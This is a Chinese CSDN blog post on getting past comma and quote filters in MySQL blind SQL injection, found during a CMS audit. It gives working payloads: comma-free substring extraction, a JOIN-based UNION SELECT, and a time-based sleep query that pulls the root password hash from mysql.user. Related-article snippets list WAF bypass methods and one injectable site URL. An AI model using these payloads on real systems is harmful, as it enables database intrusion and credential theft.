奇淫技巧:不使用单引号和逗号进行SQL注入bypass

最新推荐文章于 2024-05-10 20:51:24 发布
最新推荐文章于 2024-05-10 20:51:24 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: 安全开发 实战篇 文章标签: SQL注入bypass 注入 -1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/92651842
版权

在这里插入图片描述
0X00 背景

审计cms发现一个这样的环境:

$l_id = get('arr','l_id');
$ids = explode(',',$l_id);

拼接post中数组的请求,然后再用逗号分隔,最后带入了SQL查询。

于是就遇到了不能使用逗号的情况。

默认

display_error=off

无显错,只能盲注。

0X01解决方案:

主要解决substring的逗号问题。

参考文档:
http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_substring

select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1)=97);

127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#

select case when substring((select password from mysql.user where user='root') from 1 for 1)='e' then sleep(5) else 0 end #

substring((select password from mysql.user where user='root') from -1)='e'

以上例句请根据自己的情况而定。

Coisini、
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入绕过
西电卢本伟的博客
03-24 4489
文章目录什么是绕过注释符号绕过双写绕过大小写绕过空格绕过等号绕过内联注释绕过参数污染绕过宽字节注入 什么是绕过 个人理解是系统或者安全软件为了避免攻击者篡改一些参数来获取数据,就会自动过滤一些篡改信息的关键词。但系统和软件终究是人编写出来的,攻击者们还是有各种各样的方法绕过安全点的检测来达到自己的目的。 注释符号绕过 双写绕过 大小写绕过 空格绕过 等号绕过 内联注释绕过 参数污染绕过 宽字节注入 ...
mssql有趣的注入
一个码农的笔记
11-03 1450
这个注入点:http://www.mydcis.net/temp.asp?ID=1 这个网站有sql注入,但是他会拦截空格,单引号,分号,而且括号后面不能有字母,如果有的话,他会拦截,并且提示: 本操作将可能危害数据安全, 请确认你提交的信息。 有任何问题请联系系统管理员。 首先用order by 探测字段数,发现有45个字段,这个手工不太适合,但是这个网站可以显错,所以,我们用报
2024年SQL注入学习之初识注入bypass(六)_bypass information_schema,玩转MySQL
最新发布
2401_84301227的博客
05-10 594
为什么要这么写,因为某狗判断的就是 and 这边的字符类型。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。一般要看报错的语句,当然也不是加个引号没报错就没了,具体分很多情况的。然后SQLmap 一丢有waf就凉凉,可能and的时候就凉了,所以手工是也算个必修课吧。
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 1576
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
SQL注入详细探讨
扉葉的技術空間
02-15 983
这几日整理一些以前看过的网路文章,替一些比较冷门的站点做备份,也许以后会再阅读到 SQL注入原理 1、 判断环境,寻找注入点,判断数据库类型。 不同的数据库的函数、注入方法都是有差异的,所以在注入之前,我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer,网上超过99%的网站都是其中之一。 2、 注入参数类型,重构SQL语句
【WAF剖析】——sql注入bypass深度剖析
Demo不是emo的博客
09-05 9732
本文分享了我自己总结的常规sql注入常规操作步骤,足够在日常sql渗透测试时使用,会不定期更新内容。
SQL注入Bypass安全狗4.0.pdf
04-08
4. 使用SQL语句注释:攻击者可以使用SQL语句注释来绕过安全狗4.0的检测,例如使用/*和*/来注释SQL语句。 防止SQL注入攻击的方法: 1. 使用prepared statements:使用prepared statements可以防止SQL注入攻击,因为...
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
0x01 环境搭建360主机卫士官网:http://zhuji.360.cn 软件版本:360主机卫士Apache 纪念版 测试环境:phpStudy本地构造S
第五篇:Bypass 护卫神SQL注入防御(多姿势)1
08-03
0x01 环境搭建护卫神官网:http://www.huweishen.com软件版本:护卫神·入侵防护系统 V3.8.1 最新版本下载地址:http://do
第四篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
0x01 环境搭建360主机卫士官网:http://zhuji.360.cn 软件版本:360主机卫士Apache 纪念版 测试环境:phpStudy本地构造S
第二篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
Bypass X-WAF SQL注入防御多姿势分析 通过对X-WAF的代码分析,我们可以了解到WAF的工作原理,并找到Bypass的方法。X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 ...
sql注入时带引号屏蔽的怎么处理
Huamang的博客
02-09 5106
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号给过滤掉了,无法使用单引号来闭合 $sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'"; 要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\转义 用\转义后面的单引号 在用户名框输入\,密码框输入or 1=1 #,这样提交后,
MySQL使用逗号_不使用单引号逗号进行SQL注入
weixin_35924353的博客
02-27 266
0X00 背景审计cms发现一个这样的环境:$l_id = get('arr','l_id');$ids = explode(',',$l_id);拼接post中数组的请求,然后再用逗号分隔,最后带入了SQL查询。于是就遇到了不能使用逗号的情况。默认display_error=off无显错,只能盲注。0X00 解决方案:主要解决substring的逗号问题。参考文档:http://dev.mysq...
【WAF剖析】——SQL注入之安全狗bypass深度剖析
Demo不是emo的博客
11-23 6811
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
SQL注入及其bypass
qq_45944626的博客
08-24 1555
SQL注入及其bypassSQL注入整数型注入字符型注入报错注入布尔盲注时间盲注cookie注入UA注入bypass常用函数罕见函数代替空格特殊符号绕过WAF SQL注入 整数型注入 加入单引号 语句出错,不会回显 加and 1=1 语句执行正常,返回一般页面 加and 1=2 语句正常运行,返回原网页,但无法查询结果 id=1 order by 1 查询数据库长度,若为2 id=-1 union select 1,2 查看回显位置,若为1,2,则可在1,2处添加查询语句 id=-1 unio
SQL注入注入姿势和Bypass
2301_79870948的博客
03-20 758
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+
绕过单引号继续注入
h4ckyou_520的专栏
09-26 1568
<br />Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据库非法操作,但是随着时间的推移,Web应用程序的开发者安全意识的日渐增强,SQL注入漏洞已经呈下降消失状态,但是之前的Web程序在被动防范 SQL攻击时,还是略显乏力,或者说是考虑不太周全。比如说普遍使用的过滤关键
Sql——bypass
Poolhuang的博客
06-16 394
常见手法: ①、大小写绕过、替换绕过/*例如双写*/;(很老的WAF才有用) ②、特殊字符绕过: ③、编码绕过 ④、等价ti
sql注入bypass
ymy13326056686的博客
02-02 435
sql注入bypass
SQL_BypassWaf.pdf
04-08
综上所述,SQL_BypassWaf.pdf是一篇重要的关于WAF绕过技术的研究文章,对信息安全领域的从业者具有一定的参考价值,尤其对于渗透测试和安全攻防方面的人员来说,可以对其进行更深入的学习和探讨。文章通过对WAF的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值